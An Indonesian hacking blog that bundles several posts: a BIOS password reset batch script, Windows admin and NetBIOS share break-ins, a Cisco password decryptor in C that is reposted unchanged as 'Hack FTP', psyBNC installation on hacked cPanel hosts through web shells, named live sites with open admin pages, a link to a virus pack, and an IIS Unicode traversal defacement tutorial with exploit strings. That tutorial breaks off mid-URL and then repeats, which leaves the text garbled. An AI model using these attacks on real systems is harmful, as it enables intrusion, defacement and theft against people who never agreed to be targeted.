Thursday, June 16, 2011

Tips & Tricks

MERESET PASSWORD BIOS

Dengan sedikit bermain-main dengan Batch programming, kamu bisa me-reset password BIOS. Perlu kamu ketahui bahwa kode berikut ini akan dideteksi sebagai Virus oleh komputermu. So, disable dulu antivirusmu sebelum kamu mencopy-paste script berikut. Okeh.. ga' usah banyak omong.. lansung ajah neeh...

ctty nul

cls

@echo o 70 2e>>c:\Spyro.deb

@echo o 71 ff>>c:\Spyro.deb

@echo q>>c:\Spyro.deb

@debug

@del c:\Spyro.deb>nul

ctty con

cls

Simpan dengan nama terserahkamu.bat dan jalankan... Beres dech... restart komputer kamu.. ;)

Diposkan oleh Dj BxxA di 05:22 0 komentar Link ke posting ini

Label: yang iseng-iseng

MENEMBUS PASSWORD ADMIN WINDOWS XP

1. Nyalakan komputer yang ingin anda tembus passwordnya dan masuklah safe mode (Tekan F8)

2. Tekan Ctrl + alt + Del dan isilah form pada kotak dialog yang muncul dengan:

Login : Administrator

Password : Terserah

3. Reboot Pc tersebut.

4. Lakukan hal yang sama seperti langkah 2 dan kini anda memiliki kuasa penuh dengan komputer tersebut ;)

Diposkan oleh Dj BxxA di 05:18 0 komentar Link ke posting ini

Label: yang iseng-iseng

kirim pesen via cmd

Untuk pengguna komputer dalam sebuah jaringan LAN bisa memanfaatkan perintah pada command prompt yang bisa kirim pesan tanpa memerlukan software tambahan hhe.

Command Prompt bisa diakses dari menu Start/Programs/Accessories/Command Prompt atau dari Start/Run dan ketik cmd.

Caranya cukup gampang, dengan menggunakan command “NET SEND” anda sudah bisa mengirim pesan ke rekan anda yang terhubung LAN.

Format perintahnya adalah:

NET SEND (nama komputer) (isi pesan)

Example? Anda ingin kirim pesan ke komputer dengan nama komp1 cukup ketik:

net send komp1 bona itu keren lho :P

Bilamana pesan akan dikirim ke semua komputer dalam workgroup yang sama maka nama komputer diganti dengan ( * ), dan pesan akan muncul di semua komputer.

net send * bona itu ganteng lho :P

Perlu diinget bahwa sebelum perintah ini bisa jalanin terlebih dulu harus diaktifin service untuk messengerna.

carana:

Buka Control Panel/Administratif Tools/Services. Bilamana status pada service Messenger disable maka harus diaktifkan terlebih dahulu :D. Klik kanan pada Messenger /Properties, Startup type diganti dengan Automatic>>klik Aplly>>klik Start.. OK.

Diposkan oleh Dj BxxA di 04:50 0 komentar Link ke posting ini

Label: yang iseng-iseng

Jumat, 18 September 2009

6000 Virus ready to use

download:

download here

download here

Hack!

Or Get Hacked!!

If u like my post leave me a reply!!!

Diposkan oleh Dj BxxA di 23:00 0 komentar Link ke posting ini

Label: yang iseng-iseng

Senin, 27 Juli 2009

Install psyBNC & Eggdrop di cpanel bug

kebiasaan hacker hacker kita mencari rooting adalah untuk membuat bot eggdrop atau membuat psybnc. Namun saya beranggapan bhw kebanyakan teman teman sekalian kebingungan cara sehingga banyaklah situs situs yang di deface.

apakah kita bisa install psybnc di cpanel bug ?

lebih lanjut...

1. saya anggap bhw anda sudah berhasil melakukan upload ke dalam situs yang anda ambil lewat cpanel bug. Bila anda belum paham, silahkan anda baca tutorial tentang mengexplorasi cpanel < 5.3 di tulisan sebelumnya.

2. Upload ke dalam situs tersebut file yang bisa sebagai mediator seperti layaknya shell. Beberapa file yang bisa dijadikan mediator antara lain cgitelnet.pl, myshell.php, phpshell.php.

3. Bekerjalah di mediator tersebut.

4. Saat bekerja dengan mediator tersebut perlu anda ingat bhw kita bekerja di port 80 dengan notabene bhw anda adalah nobody (id) sehingga kita tdk bisa melakukan apapun di dalamnya. Namun kita bisa bekerja di wilayah /tmp/. Pindahlah ke folder /tmp/ dan selanjutnya bekerjalah diruang lingkup tersebut.

5. Proses instalasi psyBNC tidak akan saya jelaskan disini, karena saya anggap bhw anda sudah mahir. namun yang jadi sering kendala adalah saat mengganti port psyBNC tersebut.

6. Untuk melakukan editing port yaitu dengan menggunakan command echo. pertama adalah lakukan cat psybnc.conf

PSYBNC.SYSTEM.PORT1=31337

PSYBNC.SYSTEM.HOST1=*

PSYBNC.HOSTALLOWS.ENTRY0=*;*

Tentunya anda perlu buat ganti port tersebut.

ketiklah sebagai berikut untuk mengganti portnya

echo PSYBNC.SYSTEM.PORT1=5000 > psybnc.conf ; echo "PSYBNC.SYSTEM.HOST1=*" >> psybnc.conf ; echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> psybnc.conf

sehingga kita mendapatkan port baru yaitu port 5000

7. selanjutnya tinggal running ./psybnc dan saya sarankan anda buat menggunakan program fake untuk menghindari adminnya.

Diposkan oleh Dj BxxA di 02:08 0 komentar Link ke posting ini

Label: yang iseng-iseng

Install 2 OS

1. saya asumsikan bahwa komputer anda sudah terinstalasi windows 98 (win 2000) dengan baik, apa bila belum maka bapak dapat menginstalnya terlebih dahulu.

2. bila windows 98 sudah terinstal, maka ada baiknya bapak sudah memback-up semua data bapak, kalau-kalau terjadi kesalahan dalam mempartisi, karena kita masih sam-sama belajar, jadi pada awalnya kita harus membuat pencegahan.

3. kemudian installah partition magic 7.0 (ada dalam : pc shop 2002, pc shop 121, pc shop 2003)pada komputer bapak. dari sinilah kita memulai partisi dari hardisk tersebut.

4.setelah partition magic tadi sudah terinstal (diasumsikan bahwa tidak ada masalah pada saat anda mengFDISK komputer bapak), dalam hardisk bapak terbagi dua c:/ dan d:/, maka kita buat new partition pada hardisk bapak tersebut, kemudian kita bisa memilihnya , ada linux dan lain-lain (baca semua instruksinya, dan ikuti semua keterangan yang "recomended").

setelah partisi untuk linux dan swap-nya sudah di buat, maka bapak dapat merestart komputer bapak, dan selanjutnya partition maic yan akan bekerja untuk membagi harddisk tersebut.

5. (diasumsikan bahwa hardisk tsb telah terpartisi), maka bapak dapat merestart kembali dan kemudian mengset bios agar dapat booting dari cd-rom. lalu bapak masukan linux redhat 7.3 dan mulailah untuk menginstalnya. bapak dapat menggunakan yang graphic mode agar lebih mudah dalam penginstalan.

6. setelah itu anda tinggal next, kemudian tibalah pada language bapak dapat memilih English next lagi, installation type bapak pilih workstation, kemudian disk partitioning setup, bapak pilih “have the installer automatically partition for you”.

7. tiba pada “Automatic Partitioning” bapak pilih keep all partition and use existing free space kemudian next, bila ada pilihan (pilih OK).

8. tiba pada disk setup : klik di table dibawah yang memunyai mount = / (garis miring) kemudian di next lalu (OK).

9. boot loade configuration : bapak dapat memilih GRUB, terserah apabila mau memilih lilo, tapi kemarin saya memakai grub dan tidak bermasalah. kemudian klik di boot image nya pilih boot label DOS. Lalu tinggal next, dan selanjutnya untuk instalasi yang lain mungkin bapak bisa lanjutkan sendiri. Karena semua yang berhubungan dengan setting dual OS sudah lewat.

Diposkan oleh Dj BxxA di 02:06 0 komentar Link ke posting ini

Label: yang iseng-iseng

Hack Windows 98

1. Ok, first check to see that you have all of the necessary files.

Here they are, these should be in the control panel (start, run, control panel, network).

1. NetBEUI

2. TCP/IP

3. IPX/SPX

4. Client for Microsoft Networks

5. File Sharing for Microsoft

Of course you will also have a dial up adapter or an ethernet adapter based on

your network topology.

Ok, now that you have all that installed, you can check out remote computers.

Windows 95 is very limited in the ways you can attack remote hosts. After many

long hours I figured out a way that always works. Ok, so first get an IP. These

are easy to get. You can go on IRC and just /whois people or you can use Legion, just

check a search engine to check a bunch of IP's with filesharing enabled.

Ok, so now that you have an IP, try this...

nbtstat -A 123.456.789.1 (Fill in actual IP)

Netbios Name

^

SHARE <00>

SHARE <20> That's what we want!

FILE <1b>

and so on..

If they have the 20 there that means that they might be vulnerable. So,

go to start, programs, accessories, notepad. Then, go to start, run,

c:\windows. Then click and drag the lmhosts (exactly lmhosts, not lmhosts.sam. Check

winfile for extension) into the notepad. Add the following. So, we have our IP and netbiosname

123.456.789.1 SHARE #PRE

Then, click on File, Save. Then from MS-DOS prompt type

nbtstat -R <-- to refresh netbios>

Then, go to start, find, computer and enter the netbiosname of the

computer of the IP you have. If it finds it, that means that it has

filesharing on it, if you get a password prompt, you can try but I wouldn't

suggest it. Many computers don't have password protection. So, this was really

brief but it works, and that's what matters.

Diposkan oleh Dj BxxA di 02:04 0 komentar Link ke posting ini

Label: yang iseng-iseng

Hacking Cisco

#include

#include

char xlat[] = {

0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,

0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,

0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44

};

char pw_str1[] = "password 7 ";

char pw_str2[] = "enable-password 7 ";

char *pname;

cdecrypt(enc_pw, dec_pw)

char *enc_pw;

char *dec_pw;

{

unsigned int seed, i, val = 0;

if(strlen(enc_pw) & 1)

return(-1);

seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';

if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))

return(-1);

for (i = 2 ; i <= strlen(enc_pw); i++) {

if(i !=2 && !(i & 1)) {

dec_pw[i / 2 - 2] = val ^ xlat[seed++];

val = 0;

}

val *= 16;

if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {

val += enc_pw[i] - '0';

continue;

}

if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {

val += enc_pw[i] - 'A' + 10;

continue;

}

if(strlen(enc_pw) != i)

return(-1);

}

dec_pw[++i / 2] = 0;

return(0);

}

usage()

{

fprintf(stdout, "Usage: %s -p \n", pname);

fprintf(stdout, " %s \n", pname);

return(0);

}

main(argc,argv)

int argc;

char **argv;

{

FILE *in = stdin, *out = stdout;

char line[257];

char passwd[65];

unsigned int i, pw_pos;

pname = argv[0];

if(argc > 1)

{

if(argc > 3) {

usage();

exit(1);

}

if(argv[1][0] == '-')

{

switch(argv[1][1]) {

case 'h':

usage();

break;

case 'p':

if(cdecrypt(argv[2], passwd)) {

fprintf(stderr, "Error.\n");

exit(1);

}

fprintf(stdout, "password: %s\n",

passwd);

break;

default:

fprintf(stderr, "%s: unknow option.",

pname);

}

return(0);

}

if((in = fopen(argv[1], "rt")) == NULL)

exit(1);

if(argc > 2)

if((out = fopen(argv[2], "wt")) == NULL)

exit(1);

}

while(1) {

for(i = 0; i < 256; i++) {

if((line[i] = fgetc(in)) == EOF) {

if(i)

break;

fclose(in);

fclose(out);

return(0);

}

if(line[i] == '\r')

i--;

if(line[i] == '\n')

break;

}

pw_pos = 0;

line[i] = 0;

if(!strncmp(line, pw_str1, strlen(pw_str1)))

pw_pos = strlen(pw_str1);

if(!strncmp(line, pw_str2, strlen(pw_str2)))

pw_pos = strlen(pw_str2);

if(!pw_pos) {

fprintf(stdout, "%s\n", line);

continue;

}

if(cdecrypt(&line[pw_pos], passwd)) {

fprintf(stderr, "Error.\n");

exit(1);

}

else {

if(pw_pos == strlen(pw_str1))

fprintf(out, "%s", pw_str1);

else

fprintf(out, "%s", pw_str2);

fprintf(out, "%s\n", passwd);

}

}

}

Selamat mencoba moga2 berguna buat temen.

Diposkan oleh Dj BxxA di 02:03 0 komentar Link ke posting ini

Label: yang iseng-iseng

Hack FTP

#include

#include

char xlat[] = {

0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,

0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,

0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44

};

char pw_str1[] = "password 7 ";

char pw_str2[] = "enable-password 7 ";

char *pname;

cdecrypt(enc_pw, dec_pw)

char *enc_pw;

char *dec_pw;

{

unsigned int seed, i, val = 0;

if(strlen(enc_pw) & 1)

return(-1);

seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';

if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))

return(-1);

for (i = 2 ; i <= strlen(enc_pw); i++) {

if(i !=2 && !(i & 1)) {

dec_pw[i / 2 - 2] = val ^ xlat[seed++];

val = 0;

}

val *= 16;

if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {

val += enc_pw[i] - '0';

continue;

}

if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {

val += enc_pw[i] - 'A' + 10;

continue;

}

if(strlen(enc_pw) != i)

return(-1);

}

dec_pw[++i / 2] = 0;

return(0);

}

usage()

{

fprintf(stdout, "Usage: %s -p \n", pname);

fprintf(stdout, " %s \n", pname);

return(0);

}

main(argc,argv)

int argc;

char **argv;

{

FILE *in = stdin, *out = stdout;

char line[257];

char passwd[65];

unsigned int i, pw_pos;

pname = argv[0];

if(argc > 1)

{

if(argc > 3) {

usage();

exit(1);

}

if(argv[1][0] == '-')

{

switch(argv[1][1]) {

case 'h':

usage();

break;

case 'p':

if(cdecrypt(argv[2], passwd)) {

fprintf(stderr, "Error.\n");

exit(1);

}

fprintf(stdout, "password: %s\n",

passwd);

break;

default:

fprintf(stderr, "%s: unknow option.",

pname);

}

return(0);

}

if((in = fopen(argv[1], "rt")) == NULL)

exit(1);

if(argc > 2)

if((out = fopen(argv[2], "wt")) == NULL)

exit(1);

}

while(1) {

for(i = 0; i < 256; i++) {

if((line[i] = fgetc(in)) == EOF) {

if(i)

break;

fclose(in);

fclose(out);

return(0);

}

if(line[i] == '\r')

i--;

if(line[i] == '\n')

break;

}

pw_pos = 0;

line[i] = 0;

if(!strncmp(line, pw_str1, strlen(pw_str1)))

pw_pos = strlen(pw_str1);

if(!strncmp(line, pw_str2, strlen(pw_str2)))

pw_pos = strlen(pw_str2);

if(!pw_pos) {

fprintf(stdout, "%s\n", line);

continue;

}

if(cdecrypt(&line[pw_pos], passwd)) {

fprintf(stderr, "Error.\n");

exit(1);

}

else {

if(pw_pos == strlen(pw_str1))

fprintf(out, "%s", pw_str1);

else

fprintf(out, "%s", pw_str2);

fprintf(out, "%s\n", passwd);

}

}

}

Selamat mencoba moga2 berguna buat temen.

Diposkan oleh Dj BxxA di 02:02 0 komentar Link ke posting ini

Label: yang iseng-iseng

ASP

lebih lanjut...

ARF yang dikeluarkan oleh http://www.asp-dev.com/ bekerja pada platform Windows memiliki bug yang sangat fatal. Yaitu admin (sebenarnya admin atau pembuat template ya ?) tidak memberikan login username dan password pada bagian administrator web nya, sehingga siapa saja bisa masuk melalui http://www.target.com/forum/admin/default.asp

Sehingga semua orang bisa masuk dan melakukan editing / penghapusan / penambahan isi dari BBS -nya.

Jika anda menggunakan template tersebut dalam BBS anda, sebaiknya menambahkan login username dan password pada bagian /admin/default.asp sehingga BBS anda terhindar dari kejahilan orang lain.

Contoh yang bisa dicoba seperti berikut ini (saat penulisan ini belum dipatch) :

1. http://www.rvnair.com/bbs/admin/default.asp

2. http://www.equuspages.com/forum/forum2/admin/

3. http://www.joinweb.com/forum/admin/

Diposkan oleh Dj BxxA di 02:01 0 komentar Link ke posting ini

Label: yang iseng-iseng

Lumpuhkan Deepfreeze

Untuk Uninstall program ini atau melakukan perubahan

yang permanen pada windows, misalnya install program

baru, dibutuhkan password yang di set pada saat

install DeepFreeze.

Tanpa password ini jangan harap anda dapat merubah

setting komputer anda, jadi bisa dibayangkan jikalau

anda lupa password tersebut (mungkin yang anda lakukan

adalah memformat hardisk tersebut).

Namun jika anda mengalaminya jangan khawatir, ikuti

langkah-langkah berikut, mudah-mudahan masalah anda

dapat terselesaikan.

1. Download "XDeepFreeze" di

http://geocities.com/macancrew/xdeepfreeze.zip

2. Ekstrak ke C:\XDeepfreeze

3. Jalankan "Run_Me.exe" yang akan menghasilkan file

"mcr.bat" dan "XDeepFreeze.exe" akan terload.

4. Pada XDeepFreeze, Tekan "Stop DeepFreeze", untuk

menghentikan "frzstate.exe"

5. Pada XDeepFreeze, Tekan "Clean Registry", untuk

membersihkan registry yang dibuat deepfreeze pada saat

install.

6. Untuk masuk ke MS-Dos Mode, Jalankan "command.com"

(Sudah disertakan pada "xdeepfreeze.zip")

7. Jalankan "mcr.bat" (Berisi perintah yang akan

menghapus file "persifrz.vxd")

8. Ketik "Exit" untuk masuk ke Windows kembali.

Dan.....DeepFreeze tidak berfungsi lagi.

Silahkan install ulang DeepFreeze, ingat dan catat

baik-baik password yang anda gunakan.

Jika anda lupa lagi lakukan kembali cara diatas

Diposkan oleh Dj BxxA di 02:00 0 komentar Link ke posting ini

Label: yang iseng-iseng

Deface NT Web

Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya dilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo loe adalah web master dan loe ngerubah tampilan halaman situs yang loe punya tentu saja

itu nggak bisa disebut deface...heheheh. Banyak yang bertanya "gimana sich nge-deface situs?" seperti yang telah gue sebutin diatas proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kamu ketah

ui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbedaapabila kita ingin melakukan deface diantara kedua OS tsb. Operating

System atau OS biasanya kalo gue sich gue kelompikin ke 2 keluarga besar,yaitu :

1. IIS (server untuk microsoft, dkk)

2. Unix(linux,BSD,IRIX,SOLARIS,dsb)

Nah kita kelompikin jadi 2 gitu aja yah..:) sekarang saya coba jelaskan satu-satu. Dikarenakan sudah banyak tutorial yang membahas mengenai kelemahan dari IIS (baik IIS 4 maupun 5) maka disini gue cumancopy-paste tutorial yang pernah dibuat oleh salah satu "maha guru" dalam

komunitas #cracxer di DALNET, yah sapa lagi kalo bukan "pak-tani" (master..paLa loE lONjoNG..!!) heheheeh... ini dia tutorialnya :

~*~DEFACING NT WEB SERVER WITH BUG UNICODE MICROSOFT IIS~*~

-------------------------------------------------------------

Melalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang

menggunakan Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui...Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan "unicode bug". Sayah tidak akan menjelaskan panjang lebar mengenai "unicode bug" ini karena sayah takut salah menjelaskan (ssSSTTtHHH!! jgn bilang sapa2 yah sebenernyah sayah teh emang gak tau ...ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser.

OK...mari kita mulai...Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)...key nya terserah kowe.....Lalu utk mengetahui site itu menggunakan

MS IIS 4.0/5.0...Kita scan terlebih dahulu di www.netcraft.com......dapat site yah..??...Okeh..

setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 ...Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc....coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg bisa and DL di http://accessftp.topcities.com/.... or memakai cara manual yg lebih sering sayah gunakan ehehhehehhee...contoh:

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

Ada dua kemungkinan yang tampil pada browser Anda yaitu:

Kahiji : Muncul pesan ERROR ...

Kaduana : Muncul daftar file-file dari drive C pada komputer server target. Bila ini terjadi maka

www.targethost.com tadi ada kemungkinan untuk bisa kita deface...

Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL diatas menjadi empat bagian yaitu :

• Bagian host, yaitu "http://www.targethost.com"

• Bagian exploit string, yaitu "/scripts/..%255c..%255c"

• Bagian folder, yaitu "/winnt/system32/"

• Bagian command, yaitu "cmd.exe?/c+dir+c:\"

Kita lihat pada bagian command diatas menunjukkan perintah "dir c:\" yang berarti melihat seluruh

file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti "dir d:\"

atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda "+". Koe bahkan bisa menge

tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah "ipconfig.exe /all"

Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada

browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering

tembus adalah :

- /cgi-bin/..%255c..%255c

- /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..

- /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..

- /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..

- /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..

- /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..

- /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..

- /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..

- /scripts/..%255c..%255c

Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka

kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss ...hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran....(yg sabar yah nak nyari targetnyah...ehehhehehe).

Lanjuttt......udeh dapet site yg bug unicodenyah gak di patch..??....Langkah berikutnya adalah

mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,

index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml.

Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau

D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set

URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??...

Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah...gak ada yahh ..??...coba deh koe ripresh lagehh...udah ketemuuu...nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah.....Kita ambil contoh PATH_TRANSLATEDnyah : C:\InetPub\wwwroot....Perintahnya ng-DIR nyah :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot

Huaaaaaaa....isinyah banyak banged yahh.....mana dokumen2 web yg kita curigain itu ada 3 bijih

lagehh....hemm santeyy...oiyahh...lupa sayah...Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah.....

truss kita cari dokumen web itu disitu utk kita RENAME....gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy...coba skrg koe buka site aslinyah di laen window....

http://www.targethost.com == neh yg ini......di situ kan alias di

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot

dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME....misalnya : di

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot itu ada :

Directory of C:\InetPub\wwwroot

07/20/01 03:21p 1,590 default.htm

07/20/01 03:21p 590 index.html

07/20/01 03:21p 3,453 main.html

Udah di buka kan site aslinyah...nah coba masukin salah satu dokumen web itu di site asli nyah...

contoh : http://www.targethost.com/default.htm kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html

Lihat apa yg terjadi di IE kitaa

CGI Error

The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:

Access is denied

Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat

targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??

CGI Error

The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :

Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site

tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee

(Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk

langkah selanjutnyah*)

Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..

Kedua lewat TFTP32.

*Cara pertama :*

Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori

C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe

. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL

berikut :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.ex

Diposkan oleh Dj BxxA di 01:59 0 komentar Link ke posting ini

Label: yang iseng-iseng

Deface NT Web

Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya dilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo loe adalah web master dan loe ngerubah tampilan halaman situs yang loe punya tentu saja

itu nggak bisa disebut deface...heheheh. Banyak yang bertanya "gimana sich nge-deface situs?" seperti yang telah gue sebutin diatas proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kamu ketah

ui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbedaapabila kita ingin melakukan deface diantara kedua OS tsb. Operating

System atau OS biasanya kalo gue sich gue kelompikin ke 2 keluarga besar,yaitu :

1. IIS (server untuk microsoft, dkk)

2. Unix(linux,BSD,IRIX,SOLARIS,dsb)

Nah kita kelompikin jadi 2 gitu aja yah..:) sekarang saya coba jelaskan satu-satu. Dikarenakan sudah banyak tutorial yang membahas mengenai kelemahan dari IIS (baik IIS 4 maupun 5) maka disini gue cumancopy-paste tutorial yang pernah dibuat oleh salah satu "maha guru" dalam

komunitas #cracxer di DALNET, yah sapa lagi kalo bukan "pak-tani" (master..paLa loE lONjoNG..!!) heheheeh... ini dia tutorialnya :

~*~DEFACING NT WEB SERVER WITH BUG UNICODE MICROSOFT IIS~*~

-------------------------------------------------------------

Melalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang

menggunakan Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui...Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan "unicode bug". Sayah tidak akan menjelaskan panjang lebar mengenai "unicode bug" ini karena sayah takut salah menjelaskan (ssSSTTtHHH!! jgn bilang sapa2 yah sebenernyah sayah teh emang gak tau ...ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser.

OK...mari kita mulai...Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)...key nya terserah kowe.....Lalu utk mengetahui site itu menggunakan

MS IIS 4.0/5.0...Kita scan terlebih dahulu di www.netcraft.com......dapat site yah..??...Okeh..

setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 ...Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc....coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg bisa and DL di http://accessftp.topcities.com/.... or memakai cara manual yg lebih sering sayah gunakan ehehhehehhee...contoh:

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

Ada dua kemungkinan yang tampil pada browser Anda yaitu:

Kahiji : Muncul pesan ERROR ...

Kaduana : Muncul daftar file-file dari drive C pada komputer server target. Bila ini terjadi maka

www.targethost.com tadi ada kemungkinan untuk bisa kita deface...

Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL diatas menjadi empat bagian yaitu :

• Bagian host, yaitu "http://www.targethost.com"

• Bagian exploit string, yaitu "/scripts/..%255c..%255c"

• Bagian folder, yaitu "/winnt/system32/"

• Bagian command, yaitu "cmd.exe?/c+dir+c:\"

Kita lihat pada bagian command diatas menunjukkan perintah "dir c:\" yang berarti melihat seluruh

file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti "dir d:\"

atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda "+". Koe bahkan bisa menge

tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah "ipconfig.exe /all"

Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada

browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering

tembus adalah :

- /cgi-bin/..%255c..%255c

- /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..

- /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..

- /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..

- /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..

- /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..

- /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..

- /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..

- /scripts/..%255c..%255c

Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka

kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss ...hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran....(yg sabar yah nak nyari targetnyah...ehehhehehe).

